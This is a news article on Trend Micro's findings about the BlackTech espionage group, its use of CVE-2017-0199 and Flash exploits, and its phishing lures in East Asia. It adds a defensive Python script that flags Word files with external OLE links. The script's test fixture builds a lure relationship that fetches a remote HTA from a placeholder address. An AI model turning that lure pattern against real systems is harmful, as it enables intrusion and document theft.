A sophisticated and “well-funded” hacking group with a penchant for stealing intellectual property and other trade secrets is wreaking havoc in East Asia by exploiting a series of old, publicly known software vulnerabilities, according to research conducted by Trend Micro.
The findings are significant because they expose an active regional threat that continues to invest in new hacking capabilities, including custom backdoor implants and exfiltration tools, while apparently running multiple economic espionage operations at the same time.
Dubbed “BlackTech” by security researchers, the clandestine unit is believed to be behind three separate campaigns dating back to at least 2010. Over that period, BlackTech launched attacks from shared server infrastructure but used different tools and techniques against each set of organizations, moving laterally across victim networks and ultimately attempting to exfiltrate sensitive files.
“We are confident attributing these three campaigns to BlackTech given the backend infrastructure used and target overlap,” said Trend Micro Vice President Mark Nunnikhoven. “The backend infrastructure — where the stolen data is sent — is unique to these campaigns and it is extremely rare that unrelated criminal groups share infrastructure for targeted attacks.”
BlackTech has in the past used an exploit for an Adobe Flash vulnerability (CVE-2015-5119) that was leaked in the 2015 Hacking Team breach. The group has also exploited older, already-patched flaws in Microsoft Office and Windows, including the now infamous CVE-2017-0199, an Office bug in which a crafted document links to a remote object and causes Office to fetch and run an attacker-supplied HTA script when the file is opened.
CVE-2017-0199 has become especially popular in recent months among cybercrime groups looking for a foothold from which to plant ransomware on a server or workstation.
“The ulterior motive of [BlackTech] is to steal important documents from their victims; initial recipients of their attacks are not always their primary target,” Trend Micro’s report reads. “We saw several decoy documents stolen by the attackers that are then used against another target. This indicates that document theft is most likely the first phase of an attack chain against a victim with ties to the intended target.”
Researchers found digital forensic evidence that BlackTech had worked to compromise a variety of companies and organizations, including “privatized agencies and government contractors as well as enterprises in the consumer electronics, computer, healthcare and financial industries,” particularly those based in Taiwan and occasionally in Japan and Hong Kong.
“We’re seeing a continued investment by this group to keep their malware relevant,” said Nunnikhoven. “That’s a strong indicator that this group is having some measure of success.”
He added, “running concurrent targeted campaigns using a variety of techniques takes a lot of effort. That effort would be better spent on other cybercrimes if they weren’t getting what they are after.”
BlackTech is known to send phishing emails carrying malicious Microsoft Word attachments to employees of targeted organizations. When the attachment is opened, it calls out to the attackers’ command and control infrastructure, which then delivers additional malware to the victim’s machine.
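The lure documents described above, and the CVE-2017-0199 pattern mentioned earlier, share one observable trait: the Word file carries a relationship that points outside the document to an http(s) URL, so that Office reaches out to the attacker’s server as soon as the file is opened. The following triage script is an added example written for this page, not code from Trend Micro’s report or from BlackTech’s tooling. It unpacks a .docx (an OOXML zip), reads every `.rels` part, and flags relationships whose `TargetMode` is `External` and whose type is an OLE object or attached template, the two relationship types that trigger an automatic fetch. Ordinary external hyperlinks are reported but not flagged, because they are common in benign documents and require a click. The two sample packages, the `203.0.113.5` address and the `template.hta` file name are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"

# Relationship types that make Office fetch and process remote content on open,
# without any user click. Hyperlinks are deliberately not in this set.
AUTO_FETCH_TYPES = {
    OLE_REL: "external OLE object link (CVE-2017-0199 lure pattern)",
    TEMPLATE_REL: "remote attached template",
}


def external_relationships(docx_bytes):
    """Return (part, rel_type, target, note) for every relationship in the
    package whose Target is external and points at a network URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if not re.match(r"(?i)^(https?|ftp|file)://", target):
                    continue
                rel_type = rel.get("Type", "")
                note = AUTO_FETCH_TYPES.get(rel_type, "external hyperlink (click required)")
                findings.append((part, rel_type, target, note))
    return findings


def suspicious_relationships(docx_bytes):
    """Only the findings that cause an automatic outbound fetch on open."""
    return [f for f in external_relationships(docx_bytes) if f[1] in AUTO_FETCH_TYPES]


def build_docx(rels_xml):
    """Constructed minimal OOXML package; real documents carry many more parts,
    but the relationship file is all the check above needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed benign package: internal styles part plus a normal clickable hyperlink.
BENIGN_DOCX = build_docx(
    f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{HYPERLINK_REL}" Target="https://example.org/" TargetMode="External"/>'
    '</Relationships>')

# Constructed lure package: an OLE object whose Target is a remote HTA file.
MALICIOUS_DOCX = build_docx(
    f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{OLE_REL}" Target="http://203.0.113.5/template.hta" TargetMode="External"/>'
    '</Relationships>')

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_DOCX), ("lure", MALICIOUS_DOCX)):
        for part, _, target, note in external_relationships(blob):
            print(f"{label}: {part} -> {target} [{note}]")
        print(f"{label}: suspicious = {bool(suspicious_relationships(blob))}")
```

Running the script reports the benign document’s hyperlink as informational only and flags the lure document for its external OLE link. In a mail gateway or sandbox pipeline the same check is a cheap first pass; it does not replace detonation, since RTF-based variants of the same exploit and macro-based lures carry no `.rels` part at all.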
Experts say that competitive economic espionage, empowered by cyber means, has become common in the East Asia region. Countries like Vietnam are believed to be heavily investing in developing hacking capabilities.
For most of Asia, Chinese espionage like this remains the norm. https://t.co/GhnHmOTo2J
— John Hultquist (@JohnHultquist) June 22, 2017
Although the group uncovered by Trend Micro resembles in some respects another threat actor, “APT12,” tracked by U.S. cybersecurity firm FireEye, Nunnikhoven said there is no definitive evidence linking the two.
“We currently have no evidence that ties BlackTech to APT12. While there is some similarity in the targets and techniques, there isn’t enough data to draw a link between the two groups,” he said.